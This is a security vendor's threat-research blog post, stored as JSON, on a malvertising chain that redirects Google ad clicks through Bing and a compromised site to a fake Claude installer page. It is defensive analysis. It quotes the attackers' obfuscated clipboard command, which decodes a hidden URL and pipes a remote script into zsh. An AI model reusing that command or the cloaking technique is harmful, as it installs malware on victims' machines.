128 128 0 0-128-128 0zm88 208l0 48-48 0 0-48 48 0zm-48-40l-40 0 0 128 128 0 0-128-88 0zM400 64l48 0 0 48-48 0 0-48zM360 24l0 128 128 0 0-128-128 0zm88 208l0 48-48 0 0-48 48 0zm-48-40l-40 0 0 128 128 0 0-128-88 0zm0 208l48 0 0 48-48 0 0-48zm-40-40l0 128 128 0 0-128-128 0z",{"w":439,"h":420,"d":460},"M48 48l0 416 96 0 0-112 96 0 0 112 96 0 0-416-288 0zM0 0L384 0 384 512 0 512 0 0zM96 96l64 0 0 64-64 0 0-64zm192 0l0 64-64 0 0-64 64 0zM96 224l64 0 0 64-64 0 0-64zm192 0l0 64-64 0 0-64 64 0z",{"w":17,"h":420,"d":462},"M598.6 75.4L618 61.3 589.7 22.5C586 25.2 554.7 48 495.8 90.8l-34.1-22.7-6-4-145.2 0 0 0-144 0c-2.9 2.9-11.1 11.1-24.5 24.5-56.3-40.9-86.6-62.9-90.8-66.1L22.9 61.3c1.5 1.1 37.3 27.1 107.4 78.1l16.6 12.1c7.9-7.9 21.1-21.1 39.5-39.5l76.1 0-103 103-17 17c12.1 12.1 21.8 21.8 29.1 29.1 46.9 46.9 122.8 46.9 169.7 0L368.4 233.9 494.5 360c-16.7 16.7-29.4 29.4-38.1 38.1l-47-47-33.9 33.9 47 47-16 16-44.1 0-65-65-33.9 33.9 31 31-60.1 0-169-169-17-17-33.9 33.9 17 17 176 176 7 7 128 0 1 1 1-1 81.9 0 7-7c225.8-225.8 167.2-167.2 193-193l-33.9-33.9-64 64-143-143-17-17c-6.8 6.8-27.2 27.2-61.1 61.1-26.5 26.5-68.5 28-96.7 4.6l119.8-119.8 62.1 0 0 0 48.7 0c32.6 21.8 51.3 34.2 55.9 37.2l13.5-9.8 88-64z",{"w":425,"h":420,"d":464},"M352 96l224 0 0 224-48 0 0-142.1-191 191-17 17-17-17-111-111-139.8 139.8-17 17-33.9-33.9 17-17 156.8-156.8 17-17 17 17 111 111 174.1-174.1-142.1 0 0-48z",{"w":430,"h":420,"d":466},"M144 0l0 64 160 0 0-64 48 0 0 64 96 0 0 416-448 0 0-416 96 0 0-64 48 0zm0 112l-96 0 0 320 352 0 0-320-256 0zM261.6 228.2l84.1 12.2-60.9 59.3 14.4 83.8-75.2-39.6-75.2 39.6 14.4-83.8-60.9-59.3 84.1-12.2 37.6-76.2 37.6 76.2z",{"w":420,"h":420,"d":468},"M96 32l416 0 0 448-512 0 0-392 48 0 0 344 8 0c22.1 0 40-17.9 40-40L96 32zm38.4 400l329.6 0 0-352-320 0 0 312c0 14.4-3.5 28-9.6 40zM192 128l96 0 0 96-96 0 0-96zm152 48l72 0 0 48-96 0 0-48 24 0zM216 256l200 0 0 48-224 0 0-48 24 0zm0 80l200 0 0 48-224 0 0-48 24 0z",{"w":17,"h":420,"d":470},"M384 128a64 64 0 1 0 -128 0 64 64 0 1 0 128 0zm-176 0a112 112 0 1 1 224 0 112 112 0 1 1 -224 0zm252.8 76c5.9 2.6 12.4 4 19.2 4 26.5 0 48-21.5 48-48s-21.5-48-48-48l-.8 0c-1.6-16.6-5.8-32.4-12.1-47.1 4.2-.6 8.6-.9 12.9-.9 53 0 96 43 96 96s-43 96-96 96c-17.7 0-34.3-4.8-48.6-13.2 11.7-11.3 21.6-24.4 29.4-38.8zM208.6 242.8c-14.2 8.4-30.8 13.2-48.6 13.2-53 0-96-43-96-96s43-96 96-96c4.4 0 8.7 .3 12.9 .9-6.3 14.7-10.5 30.6-12.1 47.1l-.8 0c-26.5 0-48 21.5-48 48s21.5 48 48 48c6.8 0 13.3-1.4 19.2-4 7.8 14.4 17.7 27.5 29.4 38.8zM432 288l69.8 192-51.1 0-52.4-144-156.8 0-52.4 144-51.1 0 69.8-192 224 0zM151.2 304l-17.3 48-36.3 0-46.5 128-51.1 0 64-176 87.2 0zm354.8 48l-17.3-48 87.2 0 64 176-51.1 0-46.5-128-36.3 0z",{"w":425,"h":420,"d":472},"M144 354l-48 30 0-80-96 0 0-336 384 0 0 336-160 0-80 50zm0-56.6c43.5-27.2 65.6-41 66.2-41.4l125.8 0 0-240-288 0 0 240 96 0 0 41.4zM192 416l0-35.4 45.8-28.6 2.2 0 0 64 125.8 0c.6 .4 22.7 14.2 66.2 41.4l0-41.4 96 0 0-240-96 0 0-48 144 0 0 336-96 0 0 80-128-80-160 0 0-48zm0-340c-14.4 0-26.1 11.7-26.1 26.1l-40 0C125.9 65.6 155.5 36 192 36s66.1 29.6 66.1 66.1c0 29.7-17.7 46.9-33.3 55.6-4.5 2.5-8.9 4.8-12.9 6.2l-40 0 0-33.4c1.8-.2 3.6-.4 5.4-.6 9.7-1.1 19-2.1 27.9-7.1 7.5-4.2 12.9-10.1 12.9-20.8 0-14.4-11.7-26.1-26.1-26.1zM172 188l40 0 0 40-40 0 0-40z",{"id":474,"title":475,"authorsCollection":476,"content":486,"extension":1596,"faqItemsCollection":1597,"faqTitle":33,"featured":6,"hashTags":33,"meta":1599,"metaTitle":1600,"ogImage":33,"postType":1601,"publishedDate":1602,"relatedBlogPostsCollection":1603,"slug":1642,"stem":1643,"subtitle":33,"summary":1644,"synopsis":1655,"sys":1656,"tagsCollection":1659,"topicsCollection":1665,"__hash__":1716},"blog\u002Fblog\u002Fadception-malvertising-another-search-engines-search-results.json","Adception: malvertising another search engine’s search results to redirect to a malicious page",{"items":477},[478],{"fullName":479,"firstName":480,"jobTitle":481,"socialLinks":482,"profilePicture":484},"Luke Jennings","Luke","Vice President, R&D",[483],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fluke-jennings-042b5619b\u002F",{"url":485},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4Hosb4zKi1dA0PUyDLMe1h\u002F27e09d894861f2196ba794037986fb08\u002FT016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"json":487,"links":1518},{"data":488,"content":489,"nodeType":1517},{},[490,499,516,525,529,538,545,552,559,624,630,736,766,769,777,786,793,799,806,1029,1035,1038,1046,1053,1059,1066,1072,1079,1087,1094,1101,1109,1128,1134,1140,1147,1160,1185,1188,1196,1203,1220,1239,1246,1254,1261,1268,1271,1278,1285,1302,1305,1313,1320,1511],{"data":491,"content":492,"nodeType":498},{},[493],{"data":494,"marks":495,"value":496,"nodeType":497},{},[],"Redirects have been a common phishing detection evasion technique for as long as there have been link scanners. Push recently detected a particularly novel example: a search engine result inside a sponsored search engine ad, used as both a redirect and a checkpoint to turn away unwanted visitors.","text","paragraph",{"data":500,"content":501,"nodeType":498},{},[502,506,512],{"data":503,"marks":504,"value":505,"nodeType":497},{},[],"A sponsored Google result for \"claude mac\" displayed ",{"data":507,"marks":508,"value":511,"nodeType":497},{},[509],{"type":510},"bold","bing.com",{"data":513,"marks":514,"value":515,"nodeType":497},{},[]," as its domain, and clicking it went through a Bing search-result redirect and a compromised WordPress site before landing on a convincing fake Claude download page. Google's ad review approved a destination that was simply another search engine, and the malicious payload only appeared if you reached the end of the chain through this specific path.",{"data":517,"content":523,"nodeType":524},{"target":518},{"sys":519},{"id":520,"type":521,"linkType":522},"1UQzL6FH0smdqz93Z0wTvw","Link","Entry",[],"embedded-entry-block",{"data":526,"content":527,"nodeType":528},{},[],"hr",{"data":530,"content":531,"nodeType":537},{},[532],{"data":533,"marks":534,"value":536,"nodeType":497},{},[535],{"type":510},"Why attackers love a redirect","heading-1",{"data":539,"content":540,"nodeType":498},{},[541],{"data":542,"marks":543,"value":544,"nodeType":497},{},[],"Every checkpoint a phishing link passes through makes a decision based on a URL. Email gateways score the link in the message, ad platforms review an ad's destination, URL filters check domain reputation, and users glance at the domain before they click. ",{"data":546,"content":547,"nodeType":498},{},[548],{"data":549,"marks":550,"value":551,"nodeType":497},{},[],"A redirect lets an attacker show each of those checkpoints a trusted URL, such as Google, Microsoft or a security vendor's own domain, while deciding as late as possible who actually sees the malicious page. Most chains end on a cloaked page that shows scanners and reviewers something harmless, and on domains that can be thrown away and replaced within days while the trusted hops in front of them stay the same.",{"data":553,"content":554,"nodeType":498},{},[555],{"data":556,"marks":557,"value":558,"nodeType":497},{},[],"Attackers have found trusted redirects almost everywhere they've looked, from legit identity provider pages to URL shorteners, ad click trackers, and many more. For example:",{"data":560,"content":561,"nodeType":623},{},[562,588],{"data":563,"content":564,"nodeType":587},{},[565],{"data":566,"content":567,"nodeType":498},{},[568,572,583],{"data":569,"marks":570,"value":571,"nodeType":497},{},[],"As far back as 2020, login.microsoftonline.com links ",{"data":573,"content":575,"nodeType":582},{"uri":574},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fcloud-security\u002Fmicrosoft-and-github-oauth-implementation-vulnerabilities-lead-redirection",[576],{"data":577,"marks":578,"value":581,"nodeType":497},{},[579],{"type":580},"underline","deliberately left out the response_type parameter","hyperlink",{"data":584,"marks":585,"value":586,"nodeType":497},{},[]," so Microsoft would bounce victims to the app's phishing page. ","list-item",{"data":589,"content":590,"nodeType":587},{},[591],{"data":592,"content":593,"nodeType":498},{},[594,598,607,611,619],{"data":595,"marks":596,"value":597,"nodeType":497},{},[],"In 2025, ",{"data":599,"content":601,"nodeType":582},{"uri":600},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fthreat-insight\u002Fmicrosoft-oauth-app-impersonation-campaign-leads-mfa-phishing",[602],{"data":603,"marks":604,"value":606,"nodeType":497},{},[605],{"type":580},"fake OAuth apps posing as DocuSign, Adobe and SharePoint",{"data":608,"marks":609,"value":610,"nodeType":497},{},[]," redirected to phishing pages. This year, Microsoft described attackers",{"data":612,"content":614,"nodeType":582},{"uri":613},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F03\u002F02\u002Foauth-redirection-abuse-enables-phishing-malware-delivery\u002F",[615],{"data":616,"marks":617,"value":618,"nodeType":497},{},[]," pairing prompt=none with a deliberately invalid scope",{"data":620,"marks":621,"value":622,"nodeType":497},{},[]," to force a silent error that sends victims from Entra ID or Google to attacker-registered addresses. ","unordered-list",{"data":625,"content":629,"nodeType":524},{"target":626},{"sys":627},{"id":628,"type":521,"linkType":522},"6dXv3v9MbM112gxqLEkHoJ",[],{"data":631,"content":632,"nodeType":623},{},[633,679,702],{"data":634,"content":635,"nodeType":587},{},[636],{"data":637,"content":638,"nodeType":498},{},[639,643,651,655,663,667,675],{"data":640,"marks":641,"value":642,"nodeType":497},{},[],"google.com\u002Furl, Google AMP and Google Translate have",{"data":644,"content":646,"nodeType":582},{"uri":645},"https:\u002F\u002Fcofense.com\u002Fblog\u002Fgoogle-redirect-abuse-in-2024-key-trends-tactics",[647],{"data":648,"marks":649,"value":650,"nodeType":497},{},[]," served as standing open redirects for years",{"data":652,"marks":653,"value":654,"nodeType":497},{},[],", and",{"data":656,"content":658,"nodeType":582},{"uri":657},"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002F31950",[659],{"data":660,"marks":661,"value":662,"nodeType":497},{},[]," new campaigns abusing them",{"data":664,"marks":665,"value":666,"nodeType":497},{},[]," keep appearing. Researchers recently described",{"data":668,"content":670,"nodeType":582},{"uri":669},"https:\u002F\u002Fwww.darkreading.com\u002Fcyberattacks-data-breaches\u002Fattackers-multi-hop-google-redirects-phishing-campaign",[671],{"data":672,"marks":673,"value":674,"nodeType":497},{},[]," a single chain that passed through Google Meet, DoubleClick, Tag Manager and Analytics",{"data":676,"marks":677,"value":678,"nodeType":497},{},[],".",{"data":680,"content":681,"nodeType":587},{},[682],{"data":683,"content":684,"nodeType":498},{},[685,689,698],{"data":686,"marks":687,"value":688,"nodeType":497},{},[],"Cloudflare found",{"data":690,"content":692,"nodeType":582},{"uri":691},"https:\u002F\u002Fwww.cloudflare.com\u002Fthreat-intelligence\u002Fresearch\u002Freport\u002Fattackers-abusing-proofpoint-intermedia-link-wrapping-to-deliver-phishing-payloads\u002F",[693],{"data":694,"marks":695,"value":697,"nodeType":497},{},[696],{"type":580}," links wrapped by security tools",{"data":699,"marks":700,"value":701,"nodeType":497},{},[]," being sent through compromised mailboxes and then reused, so the phishing URL arrived on a security vendor's domain.",{"data":703,"content":704,"nodeType":587},{},[705],{"data":706,"content":707,"nodeType":498},{},[708,711,720,724,732],{"data":709,"marks":710,"value":41,"nodeType":497},{},[],{"data":712,"content":714,"nodeType":582},{"uri":713},"https:\u002F\u002Fkrebsonsecurity.com\u002F2022\u002F02\u002Fhow-phishers-are-slinking-their-links-into-linkedin\u002F",[715],{"data":716,"marks":717,"value":719,"nodeType":497},{},[718],{"type":580},"LinkedIn Smart Links",{"data":721,"marks":722,"value":723,"nodeType":497},{},[]," and ",{"data":725,"content":727,"nodeType":582},{"uri":726},"https:\u002F\u002Fcofense.com\u002Fblog\u002Fphishing-in-the-cloud-sendgrid-campaign-exploits-account-security",[728],{"data":729,"marks":730,"value":731,"nodeType":497},{},[],"SendGrid click tracking",{"data":733,"marks":734,"value":735,"nodeType":497},{},[]," have both carried phishing links on reputable domains.",{"data":737,"content":738,"nodeType":498},{},[739,743,751,754,762],{"data":740,"marks":741,"value":742,"nodeType":497},{},[],"Bing's click-tracking redirect has turned up before as well, in ",{"data":744,"content":746,"nodeType":582},{"uri":745},"https:\u002F\u002Fwww.trustwave.com\u002Fen-us\u002Fresources\u002Fblogs\u002Fspiderlabs-blog\u002Ftrusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks\u002F",[747],{"data":748,"marks":749,"value":750,"nodeType":497},{},[],"phishing emails",{"data":752,"marks":753,"value":723,"nodeType":497},{},[],{"data":755,"content":757,"nodeType":582},{"uri":756},"https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fnovel-phishing-qr-codes-bing-url-microsoft-security",[758],{"data":759,"marks":760,"value":761,"nodeType":497},{},[],"QR codes",{"data":763,"marks":764,"value":765,"nodeType":497},{},[],". But we hadn't seen it used as the destination of a search ad, and found no prior public reporting of that.",{"data":767,"content":768,"nodeType":528},{},[],{"data":770,"content":771,"nodeType":537},{},[772],{"data":773,"marks":774,"value":776,"nodeType":497},{},[775],{"type":510},"What we found",{"data":778,"content":779,"nodeType":785},{},[780],{"data":781,"marks":782,"value":784,"nodeType":497},{},[783],{"type":510},"A Google ad that points at ... Bing?","heading-2",{"data":787,"content":788,"nodeType":498},{},[789],{"data":790,"marks":791,"value":792,"nodeType":497},{},[],"The chain starts with an ordinary search. Searching Google for \"claude mac\" returned a sponsored result whose listed domain was bing.com, not a Claude lookalike or anything resembling Anthropic.",{"data":794,"content":798,"nodeType":524},{"target":795},{"sys":796},{"id":797,"type":521,"linkType":522},"4UwfOAhEWMAM9FmTd0zPIl",[],{"data":800,"content":801,"nodeType":498},{},[802],{"data":803,"marks":804,"value":805,"nodeType":497},{},[],"Clicking the ad produced four requests:",{"data":807,"content":808,"nodeType":1028},{},[809,858,901,944,986],{"data":810,"content":811,"nodeType":857},{},[812,824,835,846],{"data":813,"content":814,"nodeType":823},{},[815],{"data":816,"content":817,"nodeType":498},{},[818],{"data":819,"marks":820,"value":822,"nodeType":497},{},[821],{"type":510},"Stage","table-cell",{"data":825,"content":826,"nodeType":823},{},[827],{"data":828,"content":829,"nodeType":498},{},[830],{"data":831,"marks":832,"value":834,"nodeType":497},{},[833],{"type":510},"Request",{"data":836,"content":837,"nodeType":823},{},[838],{"data":839,"content":840,"nodeType":498},{},[841],{"data":842,"marks":843,"value":845,"nodeType":497},{},[844],{"type":510},"Status",{"data":847,"content":848,"nodeType":823},{},[849],{"data":850,"content":851,"nodeType":498},{},[852],{"data":853,"marks":854,"value":856,"nodeType":497},{},[855],{"type":510},"What it does","table-row",{"data":859,"content":860,"nodeType":857},{},[861,871,881,891],{"data":862,"content":863,"nodeType":823},{},[864],{"data":865,"content":866,"nodeType":498},{},[867],{"data":868,"marks":869,"value":870,"nodeType":497},{},[],"1",{"data":872,"content":873,"nodeType":823},{},[874],{"data":875,"content":876,"nodeType":498},{},[877],{"data":878,"marks":879,"value":880,"nodeType":497},{},[],"google.com\u002Faclk?sa=L&ai=…",{"data":882,"content":883,"nodeType":823},{},[884],{"data":885,"content":886,"nodeType":498},{},[887],{"data":888,"marks":889,"value":890,"nodeType":497},{},[],"302",{"data":892,"content":893,"nodeType":823},{},[894],{"data":895,"content":896,"nodeType":498},{},[897],{"data":898,"marks":899,"value":900,"nodeType":497},{},[],"Google's ad-click redirect",{"data":902,"content":903,"nodeType":857},{},[904,914,924,934],{"data":905,"content":906,"nodeType":823},{},[907],{"data":908,"content":909,"nodeType":498},{},[910],{"data":911,"marks":912,"value":913,"nodeType":497},{},[],"2",{"data":915,"content":916,"nodeType":823},{},[917],{"data":918,"content":919,"nodeType":498},{},[920],{"data":921,"marks":922,"value":923,"nodeType":497},{},[],"bing.com\u002Fck\u002Fa?…&u=a1…",{"data":925,"content":926,"nodeType":823},{},[927],{"data":928,"content":929,"nodeType":498},{},[930],{"data":931,"marks":932,"value":933,"nodeType":497},{},[],"200",{"data":935,"content":936,"nodeType":823},{},[937],{"data":938,"content":939,"nodeType":498},{},[940],{"data":941,"marks":942,"value":943,"nodeType":497},{},[],"Bing's search-result redirect, forwarding the browser with JavaScript",{"data":945,"content":946,"nodeType":857},{},[947,957,967,976],{"data":948,"content":949,"nodeType":823},{},[950],{"data":951,"content":952,"nodeType":498},{},[953],{"data":954,"marks":955,"value":956,"nodeType":497},{},[],"3",{"data":958,"content":959,"nodeType":823},{},[960],{"data":961,"content":962,"nodeType":498},{},[963],{"data":964,"marks":965,"value":966,"nodeType":497},{},[],"A legitimate retailer's \"about us\" page",{"data":968,"content":969,"nodeType":823},{},[970],{"data":971,"content":972,"nodeType":498},{},[973],{"data":974,"marks":975,"value":890,"nodeType":497},{},[],{"data":977,"content":978,"nodeType":823},{},[979],{"data":980,"content":981,"nodeType":498},{},[982],{"data":983,"marks":984,"value":985,"nodeType":497},{},[],"The compromised site, which forwards ad visitors to the lure",{"data":987,"content":988,"nodeType":857},{},[989,999,1009,1018],{"data":990,"content":991,"nodeType":823},{},[992],{"data":993,"content":994,"nodeType":498},{},[995],{"data":996,"marks":997,"value":998,"nodeType":497},{},[],"4",{"data":1000,"content":1001,"nodeType":823},{},[1002],{"data":1003,"content":1004,"nodeType":498},{},[1005],{"data":1006,"marks":1007,"value":1008,"nodeType":497},{},[],"claude-desk-code[.]com",{"data":1010,"content":1011,"nodeType":823},{},[1012],{"data":1013,"content":1014,"nodeType":498},{},[1015],{"data":1016,"marks":1017,"value":933,"nodeType":497},{},[],{"data":1019,"content":1020,"nodeType":823},{},[1021],{"data":1022,"content":1023,"nodeType":498},{},[1024],{"data":1025,"marks":1026,"value":1027,"nodeType":497},{},[],"The fake Claude download page","table",{"data":1030,"content":1034,"nodeType":524},{"target":1031},{"sys":1032},{"id":1033,"type":521,"linkType":522},"4RHb8PjtFNWkgTVCd13EfQ",[],{"data":1036,"content":1037,"nodeType":528},{},[],{"data":1039,"content":1040,"nodeType":537},{},[1041],{"data":1042,"marks":1043,"value":1045,"nodeType":497},{},[1044],{"type":510},"How the attack works",{"data":1047,"content":1048,"nodeType":498},{},[1049],{"data":1050,"marks":1051,"value":1052,"nodeType":497},{},[],"bing.com\u002Fck\u002Fa is the redirect Bing puts behind every result on its own search pages, so it can log clicks before sending people on. The destination is base64-encoded in the u parameter, after an a1 prefix, and Bing forwards the visitor with a short JavaScript page rather than an HTTP redirect. That's why the request shows a 200 rather than a 302, and why the browser reaches the next hop carrying a bing.com referrer. The link in this campaign also contains a timestamp that decodes to October 5, 2026, which is probably when Bing generated it.",{"data":1054,"content":1058,"nodeType":524},{"target":1055},{"sys":1056},{"id":1057,"type":521,"linkType":522},"76D4JVE0tYvkQ6ucvb4LtA",[],{"data":1060,"content":1061,"nodeType":498},{},[1062],{"data":1063,"marks":1064,"value":1065,"nodeType":497},{},[],"The Bing link points at a real, search-indexed \"about us\" page of a legitimate South American homeopathy retailer at hxxps:\u002F\u002Fhomeopatiaalemana[.]com\u002Fquienes-somos\u002F.",{"data":1067,"content":1071,"nodeType":524},{"target":1068},{"sys":1069},{"id":1070,"type":521,"linkType":522},"69F5W0D0oRTtrSXQafCMPI",[],{"data":1073,"content":1074,"nodeType":498},{},[1075],{"data":1076,"marks":1077,"value":1078,"nodeType":497},{},[],"To achieve this, the attacker has taken a legitimate Bing search result for a page they’ve compromised and used that in the malvertised Google Search ad. ",{"data":1080,"content":1081,"nodeType":785},{},[1082],{"data":1083,"marks":1084,"value":1086,"nodeType":497},{},[1085],{"type":510},"Two layers of cloaking",{"data":1088,"content":1089,"nodeType":498},{},[1090],{"data":1091,"marks":1092,"value":1093,"nodeType":497},{},[],"There are two layers of cloaking that limit the payload delivery and attempt to cloak it from unwanted visitors. The compromised site has a server-side check via 302 that requires a Bing referrer and certain browser headers. Then, the fake Claude site has a separate check via JavaScript that reads document.referrer, and anything not containing Google or Bing. goes to \u002F404.html (meaning visiting the URL directly results in the 404). ",{"data":1095,"content":1096,"nodeType":498},{},[1097],{"data":1098,"marks":1099,"value":1100,"nodeType":497},{},[],"Interestingly, visiting the compromised site from Bing also serves the malicious page. This probably isn’t intended functionality, but shows the primary target is Google Search users, not Bing users.",{"data":1102,"content":1103,"nodeType":785},{},[1104],{"data":1105,"marks":1106,"value":1108,"nodeType":497},{},[1107],{"type":510},"Visual deception on the payload",{"data":1110,"content":1111,"nodeType":498},{},[1112,1116,1124],{"data":1113,"marks":1114,"value":1115,"nodeType":497},{},[],"The final page is a polished copy of a Claude download page offering a \"Download for macOS\" button and a one-line terminal install: the ",{"data":1117,"content":1119,"nodeType":582},{"uri":1118},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finstallfix",[1120],{"data":1121,"marks":1122,"value":1123,"nodeType":497},{},[],"InstallFix",{"data":1125,"marks":1126,"value":1127,"nodeType":497},{},[]," pattern we've written about previously.",{"data":1129,"content":1133,"nodeType":524},{"target":1130},{"sys":1131},{"id":1132,"type":521,"linkType":522},"1FKiGOSBdj4LgTy0aJ5VYF",[],{"data":1135,"content":1139,"nodeType":524},{"target":1136},{"sys":1137},{"id":1138,"type":521,"linkType":522},"69ULBGgT3J9eEZZ0s3GByg",[],{"data":1141,"content":1142,"nodeType":498},{},[1143],{"data":1144,"marks":1145,"value":1146,"nodeType":497},{},[],"The install step carries two disguises of its own. The page displays Anthropic's real command, curl -fsSL https:\u002F\u002Fclaude.ai\u002Finstall.sh | bash, but its Copy button places a different command on the clipboard. ",{"data":1148,"content":1149,"nodeType":498},{},[1150,1156],{"data":1151,"marks":1152,"value":1155,"nodeType":497},{},[1153],{"type":1154},"code","echo \"Downloading Claude: hxxps:\u002F\u002Fclaude[.]ai\u002Finstall.sh\" && curl -s $(echo \"aHR0cHM6Ly9sYWtlLTkwLmNvbS9jdXJsL2luaGd1cDlhL2E5MGZrYnFkZzhkMG11czY0b2g4ZHcuZGF0\" | openssl base64 -d -A) | zsh",{"data":1157,"marks":1158,"value":1159,"nodeType":497},{},[],"\n\nThe pasted command then prints \"Downloading Claude: https:\u002F\u002Fclaude.ai\u002Finstall[.]sh\" in the terminal before decoding a hidden URL and piping a script from lake-90[.]com into zsh. A user who reads the page and then watches the terminal sees a legitimate Claude URL both times.",{"data":1161,"content":1162,"nodeType":498},{},[1163,1167,1175,1179],{"data":1164,"marks":1165,"value":1166,"nodeType":497},{},[],"We’ve identified several domains linked to the same ",{"data":1168,"content":1170,"nodeType":582},{"uri":1169},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-state-of-clickfix-by-detection-data",[1171],{"data":1172,"marks":1173,"value":1174,"nodeType":497},{},[],"criminal ClickFix toolkit",{"data":1176,"marks":1177,"value":1178,"nodeType":497},{},[]," which we track internally as AcSig (based on the headers that it requires be sent with an HMAC in order to fetch the malicious command) all using an identical macOS command, the same payload URL shape, and the same install modal code. ",{"data":1180,"marks":1181,"value":1184,"nodeType":497},{},[1182],{"type":1183},"italic","You can find the list of IoCs at the end. ",{"data":1186,"content":1187,"nodeType":528},{},[],{"data":1189,"content":1190,"nodeType":537},{},[1191],{"data":1192,"marks":1193,"value":1195,"nodeType":497},{},[1194],{"type":510},"So what?",{"data":1197,"content":1198,"nodeType":498},{},[1199],{"data":1200,"marks":1201,"value":1202,"nodeType":497},{},[],"Neither malvertising or abusing legitimate redirect functionality in attacks are new, but this is a particularly egregious example involving a legitimate search result for a legitimate (compromised) site buried in a sponsored link that seemingly points to a legitimate site (Bing). ",{"data":1204,"content":1205,"nodeType":498},{},[1206,1210,1217],{"data":1207,"marks":1208,"value":1209,"nodeType":497},{},[],"Search engine malvertising is one of the top delivery vectors we see in the wild. In fact, ",{"data":1211,"content":1212,"nodeType":582},{"uri":1169},[1213],{"data":1214,"marks":1215,"value":1216,"nodeType":497},{},[],"4 in 5 ClickFix attacks (which includes InstallFix and LLMshare variants) that we detect reach victims via search engines.",{"data":1218,"marks":1219,"value":41,"nodeType":497},{},[],{"data":1221,"content":1222,"nodeType":498},{},[1223,1227,1235],{"data":1224,"marks":1225,"value":1226,"nodeType":497},{},[],"So, a lot of malvertising is getting through. Most of the time the attackers don’t even bother to try and mask the domain and rely on an accurate-looking link description and users not paying attention to the URL (",{"data":1228,"content":1230,"nodeType":582},{"uri":1229},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalyzing-the-latest-ai-themed-malware-delivery-attacks",[1231],{"data":1232,"marks":1233,"value":1234,"nodeType":497},{},[],"though shared LLM chats that abuse real ChatGPT and Claude sharing links are another fast-growing trend too",{"data":1236,"marks":1237,"value":1238,"nodeType":497},{},[],").",{"data":1240,"content":1241,"nodeType":498},{},[1242],{"data":1243,"marks":1244,"value":1245,"nodeType":497},{},[],"In this example, the attacker is trying a bit harder than most of the examples we see. If this makes it more effective at staying off of Google’s radar and helps their scheme to run a little longer, it’s another low cost step that we can probably expect more attackers to take advantage of in the future. ",{"data":1247,"content":1248,"nodeType":785},{},[1249],{"data":1250,"marks":1251,"value":1253,"nodeType":497},{},[1252],{"type":510},"How Push detected the attack",{"data":1255,"content":1256,"nodeType":498},{},[1257],{"data":1258,"marks":1259,"value":1260,"nodeType":497},{},[],"Push detected this attack in a customer environment, and we're already actively detecting against and hunting for Adception and its likely derivatives across our customer base. Because Push analyzes the full browser session, from first click up to the page delivers the payload, as it loads in real time, the redirects in front of it don't change the outcome. And our malicious copy and paste detection identifies the malicious clipboard copy event regardless of the page used to deliver it. ",{"data":1262,"content":1263,"nodeType":498},{},[1264],{"data":1265,"marks":1266,"value":1267,"nodeType":497},{},[],"Push customers do not need to take any further action.",{"data":1269,"content":1270,"nodeType":528},{},[],{"data":1272,"content":1273,"nodeType":498},{},[1274],{"data":1275,"marks":1276,"value":1277,"nodeType":497},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",{"data":1279,"content":1280,"nodeType":498},{},[1281],{"data":1282,"marks":1283,"value":1284,"nodeType":497},{},[],"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",{"data":1286,"content":1287,"nodeType":498},{},[1288,1291,1299],{"data":1289,"marks":1290,"value":41,"nodeType":497},{},[],{"data":1292,"content":1294,"nodeType":582},{"uri":1293},"https:\u002F\u002Fpushsecurity.com\u002Fdemo",[1295],{"data":1296,"marks":1297,"value":1298,"nodeType":497},{},[],"Book a live demo to learn more.",{"data":1300,"marks":1301,"value":41,"nodeType":497},{},[],{"data":1303,"content":1304,"nodeType":528},{},[],{"data":1306,"content":1307,"nodeType":537},{},[1308],{"data":1309,"marks":1310,"value":1312,"nodeType":497},{},[1311],{"type":510},"IoCs",{"data":1314,"content":1315,"nodeType":498},{},[1316],{"data":1317,"marks":1318,"value":1319,"nodeType":497},{},[],"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to quickly spin up and rotate the sites used in the attack chain. IoC-based detections for campaigns like this are of limited value.",{"data":1321,"content":1322,"nodeType":1028},{},[1323,1348,1371,1443,1466,1489],{"data":1324,"content":1325,"nodeType":857},{},[1326,1337],{"data":1327,"content":1328,"nodeType":823},{},[1329],{"data":1330,"content":1331,"nodeType":498},{},[1332],{"data":1333,"marks":1334,"value":1336,"nodeType":497},{},[1335],{"type":510},"Type",{"data":1338,"content":1339,"nodeType":823},{},[1340],{"data":1341,"content":1342,"nodeType":498},{},[1343],{"data":1344,"marks":1345,"value":1347,"nodeType":497},{},[1346],{"type":510},"Indicator",{"data":1349,"content":1350,"nodeType":857},{},[1351,1361],{"data":1352,"content":1353,"nodeType":823},{},[1354],{"data":1355,"content":1356,"nodeType":498},{},[1357],{"data":1358,"marks":1359,"value":1360,"nodeType":497},{},[],"Google ad campaign 